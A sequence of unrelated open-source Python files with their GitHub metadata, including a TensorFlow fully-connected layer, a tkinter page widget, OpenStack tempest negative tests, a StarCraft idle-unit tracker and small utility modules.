  respectively, and whose output is added to the `REGULARIZATION_LOSSES`
  collection.

  Args:
    x: The input `Tensor`.
    num_output_units: The size of the output.
    activation_fn: activation function, default set to None to skip it and
      maintain a linear activation.
    weight_init: An optional weight initialization, defaults to
      `xavier_initializer`.
    bias_init: An initializer for the bias, defaults to 0. Set to `None` in
      order to disable bias.
    name: The name for this operation is used to name operations and to find
      variables. If specified it must be unique for this scope, otherwise a
      unique name starting with "fully_connected" will be created.  See
      `tf.variable_scope` for details.
    weight_collections: List of graph collections to which weights are added.
    bias_collections: List of graph collections to which biases are added.
    output_collections: List of graph collections to which outputs are added.
    trainable: If `True` also add variables to the graph collection
      `GraphKeys.TRAINABLE_VARIABLES` (see tf.Variable).
    weight_regularizer: A regularizer like the result of
      `l1_regularizer` or `l2_regularizer`. Used for weights.
    bias_regularizer: A regularizer like the result of
      `l1_regularizer` or `l2_regularizer`. Used for biases.

  Returns:
    The output of the fully connected layer.

  Raises:
    ValueError: if x has rank less than 2 or if its last dimension is not set.
  """
  with variable_scope.variable_scope(name, 'fully_connected', [x]):
    x = ops.convert_to_tensor(x)
    # Both the rank and the last (feature) dimension must be statically
    # known so the weight matrix can be shaped.
    dims = x.get_shape().dims
    if dims is None:
      raise ValueError('dims of x must be known but is None')
    if len(dims) < 2:
      raise ValueError('rank of x must be at least 2 not: %d' % len(dims))
    num_input_units = dims[-1].value
    if num_input_units is None:
      raise ValueError('last dimension of x must be known but is None')
    dtype = x.dtype.base_dtype

    # Variables are always tracked in the global VARIABLES collection in
    # addition to any caller-supplied collections.
    weight_collections = set(list(weight_collections or []) +
                             [ops.GraphKeys.VARIABLES])
    w = variable_scope.get_variable('weights',
                                    shape=[num_input_units, num_output_units],
                                    dtype=dtype,
                                    initializer=weight_init,
                                    collections=weight_collections,
                                    regularizer=weight_regularizer,
                                    trainable=trainable)
    # Collapse any leading dimensions so the matmul is always 2-D.
    x_2_dim = x if len(dims) <= 2 else array_ops.reshape(x,
                                                         [-1, num_input_units])
    y = standard_ops.matmul(x_2_dim, w)

    if bias_init is not None:
      bias_collections = set(list(bias_collections or []) +
                             [ops.GraphKeys.VARIABLES])
      b = variable_scope.get_variable('bias',
                                      shape=[num_output_units],
                                      dtype=dtype,
                                      initializer=bias_init,
                                      collections=bias_collections,
                                      regularizer=bias_regularizer,
                                      trainable=trainable)
      y = nn.bias_add(y, b)

    if len(dims) > 2:
      # Restore the leading dimensions, replacing the last one with
      # num_output_units: first the dynamic shape, then the static one.
      out_shape = array_ops.unpack(array_ops.shape(x))
      out_shape[-1] = num_output_units

      y = array_ops.reshape(y, array_ops.pack(out_shape))

      static_shape = x.get_shape().as_list()
      static_shape[-1] = num_output_units
      y.set_shape(static_shape)

    return _apply_activation(y, activation_fn, output_collections)
# TODO(eiderm): Verify and fix autocomplete in colab (also relu6).
# Simple aliases which remove the activation_fn parameter.
legacy_relu = functools.partial(legacy_fully_connected, activation_fn=nn.relu)
legacy_linear = functools.partial(legacy_fully_connected, activation_fn=None)
relu = functools.partial(fully_connected, activation_fn=nn.relu)
relu6 = functools.partial(fully_connected, activation_fn=nn.relu6)
linear = functools.partial(fully_connected, activation_fn=None)

# Simple aliases: short names for the long-form convolution ops above.
conv2d = convolution2d
conv2d_transpose = convolution2d_transpose
conv2d_in_plane = convolution2d_in_plane
separable_conv2d = separable_convolution2d
| {
"content_hash": "495e89965a601526f0c1347a9becc86b",
"timestamp": "",
"source": "github",
"line_count": 1865,
"max_line_length": 80,
"avg_line_length": 43.83699731903485,
"alnum_prop": 0.6341063652820588,
"repo_name": "XueqingLin/tensorflow",
"id": "2f2db2953be2ea0f026c15b5161d626f215765db",
"size": "82494",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tensorflow/contrib/layers/python/layers/layers.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "92785"
},
{
"name": "C++",
"bytes": "13132936"
},
{
"name": "CMake",
"bytes": "66864"
},
{
"name": "CSS",
"bytes": "774"
},
{
"name": "Go",
"bytes": "52718"
},
{
"name": "HTML",
"bytes": "508110"
},
{
"name": "Java",
"bytes": "51034"
},
{
"name": "JavaScript",
"bytes": "12972"
},
{
"name": "Jupyter Notebook",
"bytes": "1833435"
},
{
"name": "Makefile",
"bytes": "26273"
},
{
"name": "Objective-C",
"bytes": "7056"
},
{
"name": "Objective-C++",
"bytes": "64592"
},
{
"name": "Protocol Buffer",
"bytes": "137044"
},
{
"name": "Python",
"bytes": "12358531"
},
{
"name": "Shell",
"bytes": "266414"
},
{
"name": "TypeScript",
"bytes": "696788"
}
],
"symlink_target": ""
} |
""""""
import tkinter as tk
from tkinter import ttk
# link
__title__ = "PageView"
__version__ = "1.2.3"
__author__ = "DeflatedPickle"
class PageView(ttk.Frame):
    """
    -----DESCRIPTION-----
    A navigable frame that can hold however many pages you want.

    -----USAGE-----
    pageView = PageView(parent, back_text=[string], next_text=[string])
    pageView.pack()
    frame = ttk.Frame(pageView.frame)
    pageView.add(child=frame)

    -----PARAMETERS-----
    parent = The parent of the widget.
    back_text = The text on the back Button.
    next_text = The text on the next Button.

    -----CONTENTS-----
    ---VARIABLES---
    parent = The parent of the widget.
    _back_text = The text on the back Button.
    _next_text = The text on the next Button.
    _total_pages = The count of total pages.
    _frame_list = A list of all the added pages.

    ---TKINTER VARIABLES---
    _index = The current page.
    _page = The current page out of total pages.

    ---WIDGETS---
    self
        frame = Holds the active page.
        _navigation_frame = Hold the navigational widgets.
            _back_button = Allows the user to move backwards a page.
            _label = Shows the current frame out of the total frames.
            _next_button = Allows the user to move forward a page.

    ---FUNCTIONS---
    _back() = Moves to the page before the active one.
    _next() = Moves to the page after the active one.
    add() = Adds a new page to the widget.
    _work_out_pages() = Works out how many pages there are in total.
    """

    def __init__(self, parent, back_text="< Back", next_text="Next >", *args):
        ttk.Frame.__init__(self, parent, *args)
        self.parent = parent
        self._back_text = back_text
        self._next_text = next_text
        self._total_pages = 0
        self._frame_list = []

        self._index = tk.IntVar()
        self._index.set(0)
        self._page = tk.StringVar()
        self._page.set("0 / 0")

        self.frame = ttk.Frame(self)
        self.frame.pack(side="top", fill="both", expand=True)

        self._navigation_frame = ttk.Frame(self)
        self._navigation_frame.pack(side="bottom", fill="x")
        self._navigation_frame.columnconfigure(1, weight=1)

        # The buttons are stored under *_button names so the attributes do
        # not shadow the _back()/_next() methods they are bound to
        # (previously `self._back = ttk.Button(..., command=self._back)`
        # replaced the method reference on the instance).
        self._back_button = ttk.Button(self._navigation_frame, text=back_text,
                                       command=self._back)
        self._back_button.grid(row=0, column=0)

        self._label = ttk.Label(self._navigation_frame, textvariable=self._page)
        self._label.grid(row=0, column=1)

        self._next_button = ttk.Button(self._navigation_frame, text=next_text,
                                       command=self._next)
        self._next_button.grid(row=0, column=2)

    def _back(self):
        """Moves the PageView backwards a page."""
        if self._index.get() != 0:
            self._show_page(self._index.get() - 1)

    def _next(self):
        """Moves the PageView forwards a page."""
        if self._index.get() != len(self._frame_list) - 1:
            self._show_page(self._index.get() + 1)

    def _show_page(self, index):
        """Hides every page, then shows and records the page at *index*."""
        for frame in self._frame_list:
            frame.pack_forget()
        self._index.set(index)
        self._frame_list[index].pack(fill="both", expand=True)
        self._work_out_pages()

    def add(self, child=None):
        """Adds a new page to the PageView."""
        self._frame_list.append(child)
        # Keep the currently selected page visible.
        self._frame_list[self._index.get()].pack(fill="both", expand=True)
        # Store the count as an int; _work_out_pages() formats it.
        self._total_pages = len(self._frame_list)
        self._work_out_pages()

    def _work_out_pages(self):
        """Refreshes the 'current / total' page label.

        Uses the same ' / ' separator as the initial "0 / 0" value so the
        label format stays consistent.
        """
        self._page.set(str(self._index.get() + 1) + " / " + str(self._total_pages))
##################################################
if __name__ == "__main__":
    # Minimal manual demo: three pages with different contents.
    root = tk.Tk()
    pview = PageView(root)
    pview.pack(expand=True, padx=5, pady=5)

    # Page 1: a row of numbered buttons.
    frame1 = ttk.Frame(pview.frame)
    for number in range(3):
        ttk.Button(frame1, text=number).pack(side="left")

    # Page 2: a single checkbutton.
    frame2 = ttk.Frame(pview.frame)
    ttk.Checkbutton(frame2, text="Checkbutton").pack()

    # Page 3: a label anchored to the bottom.
    frame3 = ttk.Frame(pview.frame)
    ttk.Label(frame3, text="Frame 3").pack(side="bottom")

    for page in (frame1, frame2, frame3):
        pview.add(child=page)

    root.mainloop()
| {
"content_hash": "3e41181ce8ba27770ab9441f872fcf1c",
"timestamp": "",
"source": "github",
"line_count": 140,
"max_line_length": 91,
"avg_line_length": 32.42857142857143,
"alnum_prop": 0.561453744493392,
"repo_name": "DeflatedPickle/pkinter",
"id": "c6c43a821f0fe0c45554d399a4a556f45a86b8c1",
"size": "4586",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pkinter/pageview.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "107"
},
{
"name": "Python",
"bytes": "104715"
}
],
"symlink_target": ""
} |
import uuid
from tempest_lib import exceptions as lib_exc
import testtools
from tempest.api.compute import base
from tempest.common import tempest_fixtures as fixtures
from tempest.common.utils import data_utils
from tempest import config
from tempest import test
# Module-level handle to the global tempest configuration.
CONF = config.CONF
class ServersAdminNegativeTestJSON(base.BaseV2ComputeAdminTest):
    """
    Tests Servers API using admin privileges
    """

    @classmethod
    def resource_setup(cls):
        super(ServersAdminNegativeTestJSON, cls).resource_setup()
        # Admin client drives the negative calls; the plain (non-admin)
        # client is kept to verify policy enforcement.
        cls.client = cls.os_adm.servers_client
        cls.non_adm_client = cls.servers_client
        cls.flavors_client = cls.os_adm.flavors_client
        cls.tenant_id = cls.client.tenant_id

        # One active server shared by the reset-state/diagnostics tests.
        cls.s1_name = data_utils.rand_name('server')
        server = cls.create_test_server(name=cls.s1_name,
                                        wait_until='ACTIVE')
        cls.s1_id = server['id']

    def _get_unused_flavor_id(self):
        # Probe random ids until one is NotFound, i.e. free to create.
        flavor_id = data_utils.rand_int_id(start=1000)
        while True:
            try:
                self.flavors_client.get_flavor_details(flavor_id)
            except lib_exc.NotFound:
                break
            flavor_id = data_utils.rand_int_id(start=1000)
        return flavor_id

    @testtools.skipUnless(CONF.compute_feature_enabled.resize,
                          'Resize not available.')
    @test.attr(type=['negative', 'gate'])
    def test_resize_server_using_overlimit_ram(self):
        # Resizing to a flavor whose RAM exceeds the quota must be refused.
        # NOTE(mriedem): Avoid conflicts with os-quota-class-sets tests.
        self.useFixture(fixtures.LockFixture('compute_quotas'))
        flavor_name = data_utils.rand_name("flavor-")
        flavor_id = self._get_unused_flavor_id()
        quota_set = self.quotas_client.get_default_quota_set(self.tenant_id)
        ram = int(quota_set['ram']) + 1
        vcpus = 8
        disk = 10
        flavor_ref = self.flavors_client.create_flavor(flavor_name,
                                                       ram, vcpus, disk,
                                                       flavor_id)
        self.addCleanup(self.flavors_client.delete_flavor, flavor_id)
        self.assertRaises((lib_exc.Unauthorized, lib_exc.OverLimit),
                          self.client.resize,
                          self.servers[0]['id'],
                          flavor_ref['id'])

    @testtools.skipUnless(CONF.compute_feature_enabled.resize,
                          'Resize not available.')
    @test.attr(type=['negative', 'gate'])
    def test_resize_server_using_overlimit_vcpus(self):
        # Resizing to a flavor whose vCPUs exceed the quota must be refused.
        # NOTE(mriedem): Avoid conflicts with os-quota-class-sets tests.
        self.useFixture(fixtures.LockFixture('compute_quotas'))
        flavor_name = data_utils.rand_name("flavor-")
        flavor_id = self._get_unused_flavor_id()
        ram = 512
        quota_set = self.quotas_client.get_default_quota_set(self.tenant_id)
        vcpus = int(quota_set['cores']) + 1
        disk = 10
        flavor_ref = self.flavors_client.create_flavor(flavor_name,
                                                       ram, vcpus, disk,
                                                       flavor_id)
        self.addCleanup(self.flavors_client.delete_flavor, flavor_id)
        self.assertRaises((lib_exc.Unauthorized, lib_exc.OverLimit),
                          self.client.resize,
                          self.servers[0]['id'],
                          flavor_ref['id'])

    @test.attr(type=['negative', 'gate'])
    def test_reset_state_server_invalid_state(self):
        self.assertRaises(lib_exc.BadRequest,
                          self.client.reset_state, self.s1_id,
                          state='invalid')

    @test.attr(type=['negative', 'gate'])
    def test_reset_state_server_invalid_type(self):
        self.assertRaises(lib_exc.BadRequest,
                          self.client.reset_state, self.s1_id,
                          state=1)

    @test.attr(type=['negative', 'gate'])
    def test_reset_state_server_nonexistent_server(self):
        self.assertRaises(lib_exc.NotFound,
                          self.client.reset_state, '999')

    @test.attr(type=['negative', 'gate'])
    def test_get_server_diagnostics_by_non_admin(self):
        # Non-admin user can not view server diagnostics according to policy
        self.assertRaises(lib_exc.Unauthorized,
                          self.non_adm_client.get_server_diagnostics,
                          self.s1_id)

    @test.attr(type=['negative', 'gate'])
    def test_migrate_non_existent_server(self):
        # migrate a non existent server
        self.assertRaises(lib_exc.NotFound,
                          self.client.migrate_server,
                          str(uuid.uuid4()))

    @testtools.skipUnless(CONF.compute_feature_enabled.resize,
                          'Resize not available.')
    @testtools.skipUnless(CONF.compute_feature_enabled.suspend,
                          'Suspend is not available.')
    @test.attr(type=['negative', 'gate'])
    def test_migrate_server_invalid_state(self):
        # create server.
        server = self.create_test_server(wait_until='ACTIVE')
        server_id = server['id']
        # suspend the server.
        resp, _ = self.client.suspend_server(server_id)
        self.assertEqual(202, resp.status)
        self.client.wait_for_server_status(server_id, 'SUSPENDED')
        # migrate an suspended server should fail
        self.assertRaises(lib_exc.Conflict,
                          self.client.migrate_server,
                          server_id)
| {
"content_hash": "42a6b496cceb388f119487987ec5d200",
"timestamp": "",
"source": "github",
"line_count": 133,
"max_line_length": 76,
"avg_line_length": 41.909774436090224,
"alnum_prop": 0.5767850735557948,
"repo_name": "Vaidyanath/tempest",
"id": "7fd87f6a04b1095d4db4c531a85ec08ad171443f",
"size": "6195",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tempest/api/compute/admin/test_servers_negative.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ApacheConf",
"bytes": "695"
},
{
"name": "Python",
"bytes": "2788179"
},
{
"name": "Shell",
"bytes": "8560"
}
],
"symlink_target": ""
} |
import numpy as np
import random
from oscar.constants import *
from oscar.util.point import Point
from oscar.shared.minimap import Minimap
from oscar.shared.screen import Screen
from oscar.shared.camera import Camera
from oscar.util.unit import Unit
from oscar.util.location import Location
""" Keeps track of idle units. """
class IdleTracker():
    """Keeps track of idle friendly units.

    Combines a slow minimap heuristic (a friendly cell that has not moved
    for several steps) with a screen-level confirmation (move the camera
    and watch the candidate for several more steps).
    """

    # Number of consecutive steps a unit should be seen at the same place
    # to assess it's idle.
    _MINIMAP_IDLE_STEPS = 5
    _SCREEN_IDLE_STEPS = 10

    # states
    _INITIAL_STATE = 0
    _SCAN_SCREEN_STATE = 1

    def __init__(self):
        # Circular buffer of the last observations, indexed by timestamp.
        self._last_obs = [None] * IdleTracker._MINIMAP_IDLE_STEPS  # circular array
        self._idle_units = []
        self._idle_units_map = None    # 1 where a confirmed idle unit sits
        self._blacklist_map = None     # 1 where scanning found nothing idle

        # state machine
        self._state = None
        self._candidate = None
        self._scan_count = None
        self._candidate_list = None
        self.reset_search()

    def update(self, obs, shared):
        """
        Updates tracking data using minimap view.
        Should be called at the beginning of every step.
        """
        self._last_obs[shared['env'].timestamp % IdleTracker._MINIMAP_IDLE_STEPS] = obs

        # Lazily sized on first call, once the minimap dimensions are known.
        if self._idle_units_map is None:
            self._idle_units_map = np.zeros((shared['minimap'].width(obs), shared['minimap'].height(obs)))
        if self._blacklist_map is None:
            self._blacklist_map = np.zeros((shared['minimap'].width(obs), shared['minimap'].height(obs)))

        self._update_idle_units_map(obs, shared)
        self._update_blacklist_map(obs, shared)

    def reset_search(self):
        """
        Cancels search in progress,
        but keeps in memory found idle units.
        """
        self._state = IdleTracker._INITIAL_STATE
        self._scan_count = 0
        self._candidate_list = None

    def search_idle_unit(self, obs, shared, unit_ids=None, target=None, max_dist=None):
        """
        Searches for idle units, close to a given location.
        To do so, checks the minimap, moves the camera and observes the screen during multiple steps.
        Needs to be called multiple times at successive steps with the same arguments.

        :param unit_ids: ids of units which should be found
        :param target: location close to which units should be found
        :param max_dist: maximum distance from the point a unit could be found
        :return: a dictionary with the following fields:
            'actions': actions to be performed to keep going the search (could be None)
            'unit': the point of a found unit if one has been found at this step (could be None)
        """
        response = {
            'actions': None,
            'unit': None
        }

        if self._state == IdleTracker._INITIAL_STATE:
            self._candidate = self._get_best_idle_candidate(obs, shared, unit_ids, target, max_dist)
            if self._candidate:  # moves camera to observe candidate
                response['actions'] = [actions.FunctionCall(MOVE_CAMERA,
                                       [self._candidate.location.minimap.to_array()])]
                self._state = IdleTracker._SCAN_SCREEN_STATE
            else:  # no candidate: search failed
                return response

        elif self._state == IdleTracker._SCAN_SCREEN_STATE:
            friendly_units = self._get_friendly_units_on_screen(obs, shared)
            if self._candidate_list is None:
                self._candidate_list = friendly_units
            else:
                # Takes intersection of previous and new scanned units:
                # a unit still present in both scans has not moved.
                new_candidate_list = []
                for u in friendly_units:
                    for v in self._candidate_list:
                        if u.equals(v):
                            new_candidate_list.append(u)
                self._candidate_list = new_candidate_list

            if len(self._candidate_list) == 0:  # No idle unit on the screen
                if self._candidate in self._idle_units:
                    self._idle_units.remove(self._candidate)
                self._blacklist_screen(obs, shared)
                self.reset_search()
            else:
                self._scan_count += 1
                if self._scan_count >= IdleTracker._SCREEN_IDLE_STEPS:  # idle units found on screen
                    for u in self._candidate_list:
                        if self._blacklist_map[u.location.minimap.x, u.location.minimap.y] == 0:
                            if u.unit_id in TERRAN_BUIDINGS:
                                # Buildings never count as idle workers/army.
                                self._blacklist_map[u.location.minimap.x, u.location.minimap.y] = 1
                            elif not response['unit'] \
                                    and (unit_ids is None or u.unit_id in unit_ids):
                                # First matching unit is returned to the caller.
                                response['unit'] = u
                                if u in self._idle_units:
                                    self._idle_units.remove(u)
                                    self._idle_units_map[u.location.minimap.x, u.location.minimap.y] = 0
                                self._blacklist_map[u.location.minimap.x, u.location.minimap.y] = 1
                            else:
                                # Remember the rest as idle for later searches.
                                if self._idle_units_map[u.location.minimap.x, u.location.minimap.y] == 0:
                                    self._idle_units.append(u)
                                    self._idle_units_map[u.location.minimap.x, u.location.minimap.y] = 1
                    self.reset_search()
                else:
                    # Keep the camera still and scan again next step.
                    response['actions'] = [actions.FunctionCall(NO_OP, [])]

        if not response['actions'] and not response['unit']:
            # The current attempt ended without a result: restart immediately.
            return self.search_idle_unit(obs, shared, unit_ids, target, max_dist)
        else:
            return response

    @staticmethod
    def _get_friendly_units_on_screen(obs, shared):
        """Returns non-building friendly units visible on the screen."""
        scanned = shared['screen'].scan(obs, shared)
        friendly_units = []
        for s in scanned:
            if s.player_id == PLAYER_SELF and s.unit_id not in TERRAN_BUIDINGS:
                loc = Location(screen_loc=s.location.screen, camera_loc=shared['camera'].location(obs, shared))
                loc.compute_minimap_loc(obs, shared)
                friendly_units.append(Unit(loc, s.unit_id))
        return friendly_units

    def _update_idle_units_map(self, obs, shared):
        """Clears idle markers for cells that are no longer friendly."""
        cur_minimap = obs.observation[MINIMAP][MINI_PLAYER_RELATIVE]
        for x in range(shared['minimap'].width(obs)):
            for y in range(shared['minimap'].height(obs)):
                if cur_minimap[y, x] != PLAYER_SELF \
                        and self._idle_units_map[x, y] != 0:
                    self._idle_units_map[x, y] = 0
                    # Iterate over a snapshot: removing from the list while
                    # iterating it would silently skip elements.
                    for u in list(self._idle_units):
                        if u.location.minimap.equals(Point(x, y)):
                            self._idle_units.remove(u)

    def _update_blacklist_map(self, obs, shared):
        """Clears blacklist markers for cells that are no longer friendly."""
        cur_minimap = obs.observation[MINIMAP][MINI_PLAYER_RELATIVE]
        for x in range(shared['minimap'].width(obs)):
            for y in range(shared['minimap'].height(obs)):
                if cur_minimap[y, x] != PLAYER_SELF \
                        and self._blacklist_map[x, y] != 0:
                    self._blacklist_map[x, y] = 0

    def _blacklist_screen(self, obs, shared):
        """Blacklists every friendly minimap cell covered by the camera."""
        camera = obs.observation[MINIMAP][MINI_CAMERA]
        player_relative = obs.observation[MINIMAP][MINI_PLAYER_RELATIVE]
        for x in range(shared['minimap'].width(obs)):
            for y in range(shared['minimap'].height(obs)):
                if camera[y, x] == 1 and player_relative[y, x] == PLAYER_SELF:
                    self._blacklist_map[x, y] = 1

    def _get_new_candidates_from_minimap(self, obs, shared):
        """Returns minimap cells that stayed friendly for the last N steps."""
        friendly_fixed_points = []
        for x in range(shared['minimap'].width(obs)):
            for y in range(shared['minimap'].height(obs)):
                if self._blacklist_map[x, y] != 0 or self._idle_units_map[x, y] != 0:
                    continue
                is_idle = True
                for i in range(IdleTracker._MINIMAP_IDLE_STEPS):
                    if not self._last_obs[i]:
                        # Not enough history yet: no candidate can qualify.
                        return []
                    if self._last_obs[i].observation[MINIMAP][MINI_PLAYER_RELATIVE][y, x] != PLAYER_SELF:
                        is_idle = False
                        break
                if is_idle:
                    friendly_fixed_points.append(
                        Unit(Location(minimap_loc=Point(x, y))))
        return friendly_fixed_points

    def _get_best_idle_candidate(self, obs, shared, unit_ids=None, target=None, max_dist=None):
        """
        Returns minimap position of an idle unit candidate.
        """
        best_candidate, min_dist = None, None

        # selects best identified idle unit if it exists
        # (iterate over a snapshot: blacklisted entries are removed in place,
        # and removing while iterating the same list would skip elements)
        for u in list(self._idle_units):
            if self._blacklist_map[u.location.minimap.x, u.location.minimap.y] == 1:
                self._idle_units.remove(u)
                self._idle_units_map[u.location.minimap.x, u.location.minimap.y] = 0
            else:
                if unit_ids is None or u.unit_id in unit_ids:
                    if not target:
                        best_candidate = u
                        break
                    else:
                        dist = target.distance(u.location.minimap)
                        if (not max_dist or dist <= max_dist) and \
                                (not min_dist or dist < min_dist):
                            best_candidate = u
                            min_dist = dist

        # if there is no identified idle unit, try to find a candidate with the minimap
        if not best_candidate:
            minimap_candidates = self._get_new_candidates_from_minimap(obs, shared)
            random.shuffle(minimap_candidates)
            for u in minimap_candidates:
                if not target:
                    best_candidate = u
                    break
                else:
                    dist = target.distance(u.location.minimap)
                    if (not max_dist or dist <= max_dist) and \
                            (not min_dist or dist < min_dist):
                        best_candidate = u
                        min_dist = dist
        return best_candidate
| {
"content_hash": "69c050100573d6d3cc99d525412e7388",
"timestamp": "",
"source": "github",
"line_count": 244,
"max_line_length": 111,
"avg_line_length": 42.25819672131148,
"alnum_prop": 0.5391329647948793,
"repo_name": "Xaxetrov/OSCAR",
"id": "51898359ae9382049362d9eccd2fa5500be4e833",
"size": "10311",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "oscar/shared/idle_tracker.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "250337"
},
{
"name": "Shell",
"bytes": "3498"
}
],
"symlink_target": ""
} |
def new(num_buckets=256):
    """Initializes a Map with the given number of buckets.

    A comprehension creates a *distinct* list per bucket (the tempting
    ``[[]] * n`` would alias one list n times).
    """
    return [[] for _ in range(num_buckets)]
def hash_key(aMap, key):
    """Given a key this will create a number and then convert it to
    an index for the aMap's buckets."""
    num_buckets = len(aMap)
    return hash(key) % num_buckets
def get_bucket(aMap, key):
    """Given a key, find the bucket where it would go."""
    return aMap[hash_key(aMap, key)]
def get_slot(aMap, key, default=None):
    """Return (index, key, value) for *key* in its bucket,
    or (-1, key, default) when the key is absent."""
    for slot_index, (stored_key, stored_value) in enumerate(get_bucket(aMap, key)):
        if stored_key == key:
            return slot_index, stored_key, stored_value
    return -1, key, default
| {
"content_hash": "fb8f7eb58be8db81491fdafb71b602fa",
"timestamp": "",
"source": "github",
"line_count": 27,
"max_line_length": 67,
"avg_line_length": 26,
"alnum_prop": 0.5997150997150997,
"repo_name": "githubfun/lphw",
"id": "2a1374241bf29af48c99b4f368ba8457d615e450",
"size": "702",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "hashmap.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "956"
},
{
"name": "Python",
"bytes": "41990"
}
],
"symlink_target": ""
} |
"""Wait for all subtasks have done.
"""
import tornado
import tornado.locks
from tornado.concurrent import Future
class ProcessWaiter(tornado.locks._TimeoutGarbageCollector):
    """Lets callers wait until all in-flight subtasks have finished.

    Works like an inverted semaphore: ``processing()`` decrements the
    counter when a subtask starts, ``done()`` increments it back, and
    ``wait_all_done()`` resolves once the counter returns to zero.

    NOTE(review): relies on tornado private helpers
    (``_TimeoutGarbageCollector``, ``_ReleasingContextManager``) and on
    ``tornado.gen`` / ``tornado.ioloop`` being reachable as attributes of
    the bare ``tornado`` import — confirm against the pinned tornado
    version.
    """

    def __init__(self):
        super(ProcessWaiter, self).__init__()
        # 0 means no subtask in flight; negative means abs(value) subtasks
        # are still processing.
        self._value = 0

    def __repr__(self):
        res = super(ProcessWaiter, self).__repr__()
        extra = 'locked' if self._value == 0 else 'unlocked,value:{0}'.format(
            self._value)
        if self._waiters:
            extra = '{0},waiters:{1}'.format(extra, len(self._waiters))
        return '<{0} [{1}]>'.format(res[1:-1], extra)

    def __enter__(self):
        # Context-manager form: the with-block is one subtask.
        self.processing()
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        self.done()

    def processing(self):
        """Decrement the counter to record that a subtask has started."""
        self._value -= 1

    def done(self):
        """Increment the counter; wake every waiter when it reaches zero."""
        self._value += 1
        if self._value == 0:
            # wake all waiters and release them
            while self._waiters:
                waiter = self._waiters.popleft()
                waiter.set_result(tornado.locks._ReleasingContextManager(waiter))

    def wait_all_done(self, timeout=None):
        """Return a Future that resolves once every subtask called done().

        Resolves immediately when nothing is in flight; raises
        ProcessWaiterSemaphoreException when the counter is positive
        (more done() than processing() calls).
        """
        waiter = Future()
        if self._value == 0:
            waiter.set_result(tornado.locks._ReleasingContextManager(self))
        elif self._value < 0:
            self._waiters.append(waiter)
            if timeout:
                def on_timeout():
                    waiter.set_exception(tornado.gen.TimeoutError())
                    self._garbage_collect()
                io_loop = tornado.ioloop.IOLoop.current()
                timeout_handle = io_loop.add_timeout(timeout, on_timeout)
                waiter.add_done_callback(
                    lambda _: io_loop.remove_timeout(timeout_handle))
        else:
            raise ProcessWaiterSemaphoreException('Semaphore value is positive (val:%d)' % self._value)
        return waiter
class ProcessWaiterSemaphoreException(Exception):
    """Raised when the waiter's counter goes positive (unbalanced done() calls)."""
    pass
| {
"content_hash": "dc5621307a7a4ca3b23a05e203d718c9",
"timestamp": "",
"source": "github",
"line_count": 61,
"max_line_length": 103,
"avg_line_length": 33.032786885245905,
"alnum_prop": 0.5712158808933002,
"repo_name": "ly0/starfarming-python",
"id": "430a23fd10c18592aea0f46c2df1f1e73fec3911",
"size": "2030",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tornado/wait_subtasks.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "20633"
}
],
"symlink_target": ""
} |
from chameleon.tales import StructureExpr
from chameleon.codegen import template
from smc.mw import MediaWiki
class MediaWikiExpression(StructureExpr):
    """Chameleon TALES expression that renders its value as MediaWiki markup.

    The compiled body first evaluates the wrapped expression into
    ``target``, then re-assigns ``target`` with the HTML string produced
    by ``smc.mw.MediaWiki``.
    """

    def __call__(self, target, engine):
        compiler = engine.parse(self.expression)
        body = compiler.assign_value(target)
        # The generated snippet imports MediaWiki itself so the compiled
        # template module is self-contained at render time.
        # (A previously-defined local mw_render() helper was dead code and
        # has been removed.)
        # NOTE(review): self.wrapper_class is assumed to be provided by
        # StructureExpr — confirm.
        return body + template(
            "from smc.mw import MediaWiki ; target = MediaWiki(target).as_string()",
            target=target,
            wrapper=self.wrapper_class)
| {
"content_hash": "4b4f3c33394e022d81e1cf9b6ba6fdb1",
"timestamp": "",
"source": "github",
"line_count": 17,
"max_line_length": 103,
"avg_line_length": 35.411764705882355,
"alnum_prop": 0.6428571428571429,
"repo_name": "cyplp/cyplp.wikipedia",
"id": "7a2432f1fa01a421d82076a163e36b435a11f013",
"size": "602",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "cyplp/wikipedia/mw_expression.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "2874"
},
{
"name": "Python",
"bytes": "14822"
}
],
"symlink_target": ""
} |
from functools import partial
from plaid.errors import PLAID_ERROR_MAP
from plaid.http import _outer_http_request
from plaid.utils import to_json
# Shared low-level requester, built once at import time.
_base_http_request = _outer_http_request()


# method keyword arg to simplify partial function application
def http_request(url, method=None, data=None, suppress_errors=False):
    """Issue an HTTP request and raise the mapped Plaid error, if any.

    With ``suppress_errors=True`` the raw response is returned even for
    error status codes.
    """
    response = _base_http_request(url, method, data or {})
    error_cls = PLAID_ERROR_MAP.get(response.status_code)
    if suppress_errors or error_cls is None:
        return response
    payload = to_json(response)
    raise error_cls(payload['resolve'], payload['code'])
# Verb-specific shortcuts: each pins http_request's HTTP method.
delete_request = partial(http_request, method='DELETE')
get_request = partial(http_request, method='GET')
post_request = partial(http_request, method='POST')
patch_request = partial(http_request, method='PATCH')
| {
"content_hash": "efb586c5bfdd59a9ab364177ead49335",
"timestamp": "",
"source": "github",
"line_count": 26,
"max_line_length": 69,
"avg_line_length": 32.19230769230769,
"alnum_prop": 0.7264038231780168,
"repo_name": "erikbern/plaid-python",
"id": "b271a5c9a1306ae8119f7e6566f61a52b00ed529",
"size": "837",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "plaid/requester.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "153"
},
{
"name": "Python",
"bytes": "30013"
}
],
"symlink_target": ""
} |
# Module intentionally disabled: its contents moved to PredictedTESS.py.
raise Exception("TESS.py got replaced with PredictedTESS.py")
| {
